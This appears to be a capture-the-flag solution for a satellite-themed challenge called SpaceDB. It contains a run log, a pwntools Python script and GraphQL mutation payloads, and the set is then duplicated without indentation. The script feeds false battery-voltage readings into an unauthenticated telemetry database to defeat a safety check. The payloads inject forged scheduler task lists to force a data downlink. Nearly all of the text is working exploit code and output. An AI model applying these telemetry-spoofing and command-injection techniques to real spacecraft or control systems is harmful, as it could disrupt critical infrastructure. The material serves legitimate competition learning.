pdelteil/exploit.sh

## exploit.sh
(ctf) [darkarnium::Callisto SpaceDB][0]$ python3 -i flagger.py
[x] Opening connection to spacedb.satellitesabove.me on port 5062
[x] Opening connection to spacedb.satellitesabove.me on port 5062: Trying 18.191.160.21
[+] Opening connection to spacedb.satellitesabove.me on port 5062: Done
[*] Sending ticket
[*] Waiting for Telemetry service endpoint
[*] 18.191.160.21:19587/tel/graphiql
[*] Starting voltage fix-up thread
[*] Waiting for Scheduler service to start
[!] VIDIODE fixed to 7.0 (from 6.47) for 1590260897.99999
[*] 18.191.160.21:19587/sch/graphiql
[!] VIDIODE fixed to 7.0 (from 6.473900264) for 1590260935.99999
[*] update_tel  info: Updating reaction_wheel telemetry.
[*] update_tel  info: Updating gps telemetry.
[*] update_tel  info: Updating eps telemetry.
[*] critical-tel-check  info: Detected new telemetry values.
[*] critical-tel-check  info: Checking recently inserted telemetry values.
[*] critical-tel-check  info: Checking gps subsystem
[*] critical-tel-check  info: gps subsystem: OK
[*] critical-tel-check  info: reaction_wheel telemetry check.
[*] critical-tel-check  info: reaction_wheel subsystem: OK.
[*] critical-tel-check  info: eps telemetry check.
[*] critical-tel-check  warn: Solar panel voltage low
[*] critical-tel-check  info: eps subsystem: OK
[*] critical-tel-check  info: System: OK.
[*] critical-tel-check  info: Position: GROUNDPOINT
[!] VIDIODE fixed to 7.0 (from 6.477303053) for 1590260995.99999
[*] update_tel  info: Updating reaction_wheel telemetry.
[*] update_tel  info: Updating gps telemetry.
[*] update_tel  info: Updating eps telemetry.
[*] critical-tel-check  info: Detected new telemetry values.
[*] critical-tel-check  info: Checking recently inserted telemetry values.
[*] critical-tel-check  info: Checking gps subsystem
[*] critical-tel-check  info: gps subsystem: OK
[*] critical-tel-check  info: reaction_wheel telemetry check.
[*] critical-tel-check  info: reaction_wheel subsystem: OK.
[*] critical-tel-check  info: eps telemetry check.
[*] critical-tel-check  warn: VIDIODE battery voltage too low.
[*] critical-tel-check  warn: Solar panel voltage low
[*] critical-tel-check  warn: System CRITICAL.
[*] critical-tel-check  info: Position: GROUNDPOINT
[*] critical-tel-check  warn: Stopping non-essential services.
[*] critical-tel-check  warn: Debug telemetry database running at: 18.191.160.21:19587/tel/graphiql
[*] critical-tel-check  info: Closing scheduler service.
[!] VIDIODE fixed to 7.0 (from 6.477303053) for 1590260995.99999
[*] critical-tel-check  info: Detected new telemetry values.
[*] critical-tel-check  info: Checking recently inserted telemetry values.
[*] critical-tel-check  info: Checking gps subsystem
[*] critical-tel-check  info: gps subsystem: OK
[*] critical-tel-check  info: reaction_wheel telemetry check.
[*] critical-tel-check  info: reaction_wheel subsystem: OK.
[*] critical-tel-check  info: eps telemetry check.
[*] critical-tel-check  warn: Solar panel voltage low
[*] critical-tel-check  info: eps subsystem: OK
[*] critical-tel-check  info: Position: GROUNDPOINT
[*] critical-tel-check  warn: System: OK. Resuming normal operations.
[*] critical-tel-check  info: Scheduler service comms started successfully at: 18.191.160.21:19587/sch/graphiql
[*] Low_power mode enabled.
[*] Timetraveling.
[*] Transmission mode enabled.
[*] Pointing to ground.
[*] Transmitting...
[*] ----- Downlinking -----
[*] Recieved flag.
[*] flag{foxtrot47377romeo:GBN8mWXevsmDq8mApvRvJlN5hMCcCY7bFp4QMZ3XyTxEcFv5F3Ob0Ld4HDSs08-wZWtZf84bwzjD2TulrB_-0xw}
[*] Downlink disabled.
[*] Adjusting to sunpoint...
[*] Sunpoint: TRUE
[*] Goodbye

## flagger.py
import re
import os
import glob
import time
import math
import requests
import threading

from pwn import *

TICKET = 'ticket{foxtrot47377romeo:GOQrsg86Lzk7zuEyjS8MoCoBXYFsoTH8LKdCocfTduVhDXIczFfB5GU_wdR3RmRuSg}'
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0'


def do_query(uri, query):
    endpoint = 'http://{0}/graphql'.format(uri.split('/')[0])
    r = requests.post(
        endpoint,
        json={
            'query': query,
            'operationName': None,
            'variables': None,
        },
        headers={
            'Content-Type': 'application/json',
            'Accept': 'application/json',
            'Origin': endpoint.replace('/graphql', ''),
            'Referer': "http://{0}".format(uri),
            'User-Agent': USER_AGENT,
        }
    )
    return r.json()


def fix_voltage(uri):
    # Watch and replace voltage readings.
    while True:
        try:
            updates = [
                {
                    "parameter": "VIDIODE",
                    "new_value": "7.0",
                },
            ]
            for update in updates:
                # Get the latest telemetry value for the given parameter.
                telemetry = do_query(
                    uri,
                    '{{telemetry(parameter: "{0}", limit: 1){{value timestamp}}}}'.format(
                        update['parameter']
                    )
                )
                # Update with our specified value - if not already set.
                element = telemetry['data']['telemetry'][0]
                timestamp = '{0}.{1}'.format(
                    str(math.floor(element['timestamp'])),
                    '99999'
                )
                if element['value'] != update['new_value']:
                    log.warning(
                        '{0} fixed to {1} (from {3}) for {2}'.format(
                            update['parameter'],
                            update['new_value'],
                            timestamp,
                            element['value']
                        )
                    )
                    do_query(
                        uri,
                        'mutation {{insert(timestamp:{0},subsystem:"eps",parameter:"{1}",value: "{2}"){{success errors}}}}'.format(
                            timestamp,
                            update['parameter'],
                            update['new_value']
                        )
                    )
            time.sleep(1)
        except Exception:
            pass


if __name__ == '__main__':
    sock = remote('spacedb.satellitesabove.me', 5062)

    # Send ticket.
    sock.recvuntil('Ticket please:')
    log.info('Sending ticket')
    sock.sendline(str(TICKET))

    # Process out GraphQL endpoint.
    log.info('Waiting for Telemetry service endpoint')
    sock.recvuntil('telemetry database running at:')
    uri = sock.recvline().strip().decode('utf-8')
    log.info(uri)

    # Run a thread to constantly fix the voltage.
    log.info('Starting voltage fix-up thread')
    voltage_thread = threading.Thread(target=fix_voltage, args=(uri,))
    voltage_thread.start()

    # # Process out GraphQL endpoint.
    log.info('Waiting for Scheduler service to start')
    sock.recvuntil('Scheduler service comms started successfully at:')
    uri = sock.recvline().strip().decode('utf-8')
    log.info(uri)

    # DEBUG.
    while True:
        line = sock.recvline().strip().decode('utf-8')
        if line:
            log.info(line)

## payloads.graphql
mutation{
    importRawTaskList(
        name:"nominal-op",
        mode:"low_power",
        json:"{\"tasks\":[{\"delay\":null,\"time\":\"2020-05-23 19:59:10\",\"description\":\"Orient antenna to ground.\",\"period\":null,\"app\":{\"name\":\"groundpoint\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:57:28\",\"description\":\"Power-up downlink antenna.\",\"period\":null,\"app\":{\"name\":\"enable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:57:29\",\"description\":\"Flag\",\"period\":null,\"app\":{\"name\":\"request_flag_telemetry\",\"args\":[\"--win\"],\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:57:33\",\"description\":\"Power-down downlink antenna.\",\"period\":null,\"app\":{\"name\":\"disable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:30\",\"description\":\"Orient solar panels at sun.\",\"period\":null,\"app\":{\"name\":\"sunpoint\",\"args\":null,\"config\":null}}]}"
    ) {
        success: success,
        errors: errors
    }
}

mutation{
    importRawTaskList(
        name:"nominal-op",
        mode:"transmission",
        json:"{\"tasks\":[{\"delay\":null,\"time\":\"2020-05-23 19:59:20\",\"description\":\"Orient antenna to ground.\",\"period\":null,\"app\":{\"name\":\"groundpoint\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:40\",\"description\":\"Power-up downlink antenna.\",\"period\":null,\"app\":{\"name\":\"enable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:42\",\"description\":\"Flag\",\"period\":null,\"app\":{\"name\":\"request_flag_telemetry\",\"args\":[\"--win\"],\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:50\",\"description\":\"Power-down downlink antenna.\",\"period\":null,\"app\":{\"name\":\"disable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:52\",\"description\":\"Orient solar panels at sun.\",\"period\":null,\"app\":{\"name\":\"sunpoint\",\"args\":null,\"config\":null}}]}"
    ) {
        success: success,
        errors: errors
    }
}

mutation{
    activateMode(name: "low_power") {
        success: success,
        errors: errors
    }
}
	(ctf) [darkarnium::Callisto SpaceDB][0]$ python3 -i flagger.py
	[x] Opening connection to spacedb.satellitesabove.me on port 5062
	[x] Opening connection to spacedb.satellitesabove.me on port 5062: Trying 18.191.160.21
	[+] Opening connection to spacedb.satellitesabove.me on port 5062: Done
	[*] Sending ticket
	[*] Waiting for Telemetry service endpoint
	[*] 18.191.160.21:19587/tel/graphiql
	[*] Starting voltage fix-up thread
	[*] Waiting for Scheduler service to start
	[!] VIDIODE fixed to 7.0 (from 6.47) for 1590260897.99999
	[*] 18.191.160.21:19587/sch/graphiql
	[!] VIDIODE fixed to 7.0 (from 6.473900264) for 1590260935.99999
	[*] update_tel info: Updating reaction_wheel telemetry.
	[*] update_tel info: Updating gps telemetry.
	[*] update_tel info: Updating eps telemetry.
	[*] critical-tel-check info: Detected new telemetry values.
	[*] critical-tel-check info: Checking recently inserted telemetry values.
	[*] critical-tel-check info: Checking gps subsystem
	[*] critical-tel-check info: gps subsystem: OK
	[*] critical-tel-check info: reaction_wheel telemetry check.
	[*] critical-tel-check info: reaction_wheel subsystem: OK.
	[*] critical-tel-check info: eps telemetry check.
	[*] critical-tel-check warn: Solar panel voltage low
	[*] critical-tel-check info: eps subsystem: OK
	[*] critical-tel-check info: System: OK.
	[*] critical-tel-check info: Position: GROUNDPOINT
	[!] VIDIODE fixed to 7.0 (from 6.477303053) for 1590260995.99999
	[*] update_tel info: Updating reaction_wheel telemetry.
	[*] update_tel info: Updating gps telemetry.
	[*] update_tel info: Updating eps telemetry.
	[*] critical-tel-check info: Detected new telemetry values.
	[*] critical-tel-check info: Checking recently inserted telemetry values.
	[*] critical-tel-check info: Checking gps subsystem
	[*] critical-tel-check info: gps subsystem: OK
	[*] critical-tel-check info: reaction_wheel telemetry check.
	[*] critical-tel-check info: reaction_wheel subsystem: OK.
	[*] critical-tel-check info: eps telemetry check.
	[*] critical-tel-check warn: VIDIODE battery voltage too low.
	[*] critical-tel-check warn: Solar panel voltage low
	[*] critical-tel-check warn: System CRITICAL.
	[*] critical-tel-check info: Position: GROUNDPOINT
	[*] critical-tel-check warn: Stopping non-essential services.
	[*] critical-tel-check warn: Debug telemetry database running at: 18.191.160.21:19587/tel/graphiql
	[*] critical-tel-check info: Closing scheduler service.
	[!] VIDIODE fixed to 7.0 (from 6.477303053) for 1590260995.99999
	[*] critical-tel-check info: Detected new telemetry values.
	[*] critical-tel-check info: Checking recently inserted telemetry values.
	[*] critical-tel-check info: Checking gps subsystem
	[*] critical-tel-check info: gps subsystem: OK
	[*] critical-tel-check info: reaction_wheel telemetry check.
	[*] critical-tel-check info: reaction_wheel subsystem: OK.
	[*] critical-tel-check info: eps telemetry check.
	[*] critical-tel-check warn: Solar panel voltage low
	[*] critical-tel-check info: eps subsystem: OK
	[*] critical-tel-check info: Position: GROUNDPOINT
	[*] critical-tel-check warn: System: OK. Resuming normal operations.
	[*] critical-tel-check info: Scheduler service comms started successfully at: 18.191.160.21:19587/sch/graphiql
	[*] Low_power mode enabled.
	[*] Timetraveling.
	[*] Transmission mode enabled.
	[*] Pointing to ground.
	[*] Transmitting...
	[*] ----- Downlinking -----
	[*] Recieved flag.
	[*] flag{foxtrot47377romeo:GBN8mWXevsmDq8mApvRvJlN5hMCcCY7bFp4QMZ3XyTxEcFv5F3Ob0Ld4HDSs08-wZWtZf84bwzjD2TulrB_-0xw}
	[*] Downlink disabled.
	[*] Adjusting to sunpoint...
	[*] Sunpoint: TRUE
	[*] Goodbye
	import re
	import os
	import glob
	import time
	import math
	import requests
	import threading

	from pwn import *

	TICKET = 'ticket{foxtrot47377romeo:GOQrsg86Lzk7zuEyjS8MoCoBXYFsoTH8LKdCocfTduVhDXIczFfB5GU_wdR3RmRuSg}'
	USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0'


	def do_query(uri, query):
	endpoint = 'http://{0}/graphql'.format(uri.split('/')[0])
	r = requests.post(
	endpoint,
	json={
	'query': query,
	'operationName': None,
	'variables': None,
	},
	headers={
	'Content-Type': 'application/json',
	'Accept': 'application/json',
	'Origin': endpoint.replace('/graphql', ''),
	'Referer': "http://{0}".format(uri),
	'User-Agent': USER_AGENT,
	}
	)
	return r.json()


	def fix_voltage(uri):
	# Watch and replace voltage readings.
	while True:
	try:
	updates = [
	{
	"parameter": "VIDIODE",
	"new_value": "7.0",
	},
	]
	for update in updates:
	# Get the latest telemetry value for the given parameter.
	telemetry = do_query(
	uri,
	'{{telemetry(parameter: "{0}", limit: 1){{value timestamp}}}}'.format(
	update['parameter']
	)
	)
	# Update with our specified value - if not already set.
	element = telemetry['data']['telemetry'][0]
	timestamp = '{0}.{1}'.format(
	str(math.floor(element['timestamp'])),
	'99999'
	)
	if element['value'] != update['new_value']:
	log.warning(
	'{0} fixed to {1} (from {3}) for {2}'.format(
	update['parameter'],
	update['new_value'],
	timestamp,
	element['value']
	)
	)
	do_query(
	uri,
	'mutation {{insert(timestamp:{0},subsystem:"eps",parameter:"{1}",value: "{2}"){{success errors}}}}'.format(
	timestamp,
	update['parameter'],
	update['new_value']
	)
	)
	time.sleep(1)
	except Exception:
	pass


	if __name__ == '__main__':
	sock = remote('spacedb.satellitesabove.me', 5062)

	# Send ticket.
	sock.recvuntil('Ticket please:')
	log.info('Sending ticket')
	sock.sendline(str(TICKET))

	# Process out GraphQL endpoint.
	log.info('Waiting for Telemetry service endpoint')
	sock.recvuntil('telemetry database running at:')
	uri = sock.recvline().strip().decode('utf-8')
	log.info(uri)

	# Run a thread to constantly fix the voltage.
	log.info('Starting voltage fix-up thread')
	voltage_thread = threading.Thread(target=fix_voltage, args=(uri,))
	voltage_thread.start()

	# # Process out GraphQL endpoint.
	log.info('Waiting for Scheduler service to start')
	sock.recvuntil('Scheduler service comms started successfully at:')
	uri = sock.recvline().strip().decode('utf-8')
	log.info(uri)

	# DEBUG.
	while True:
	line = sock.recvline().strip().decode('utf-8')
	if line:
	log.info(line)
	mutation{
	importRawTaskList(
	name:"nominal-op",
	mode:"low_power",
	json:"{\"tasks\":[{\"delay\":null,\"time\":\"2020-05-23 19:59:10\",\"description\":\"Orient antenna to ground.\",\"period\":null,\"app\":{\"name\":\"groundpoint\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:57:28\",\"description\":\"Power-up downlink antenna.\",\"period\":null,\"app\":{\"name\":\"enable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:57:29\",\"description\":\"Flag\",\"period\":null,\"app\":{\"name\":\"request_flag_telemetry\",\"args\":[\"--win\"],\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:57:33\",\"description\":\"Power-down downlink antenna.\",\"period\":null,\"app\":{\"name\":\"disable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:30\",\"description\":\"Orient solar panels at sun.\",\"period\":null,\"app\":{\"name\":\"sunpoint\",\"args\":null,\"config\":null}}]}"
	) {
	success: success,
	errors: errors
	}
	}

	mutation{
	importRawTaskList(
	name:"nominal-op",
	mode:"transmission",
	json:"{\"tasks\":[{\"delay\":null,\"time\":\"2020-05-23 19:59:20\",\"description\":\"Orient antenna to ground.\",\"period\":null,\"app\":{\"name\":\"groundpoint\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:40\",\"description\":\"Power-up downlink antenna.\",\"period\":null,\"app\":{\"name\":\"enable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:42\",\"description\":\"Flag\",\"period\":null,\"app\":{\"name\":\"request_flag_telemetry\",\"args\":[\"--win\"],\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:50\",\"description\":\"Power-down downlink antenna.\",\"period\":null,\"app\":{\"name\":\"disable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:52\",\"description\":\"Orient solar panels at sun.\",\"period\":null,\"app\":{\"name\":\"sunpoint\",\"args\":null,\"config\":null}}]}"
	) {
	success: success,
	errors: errors
	}
	}

	mutation{
	activateMode(name: "low_power") {
	success: success,
	errors: errors
	}
	}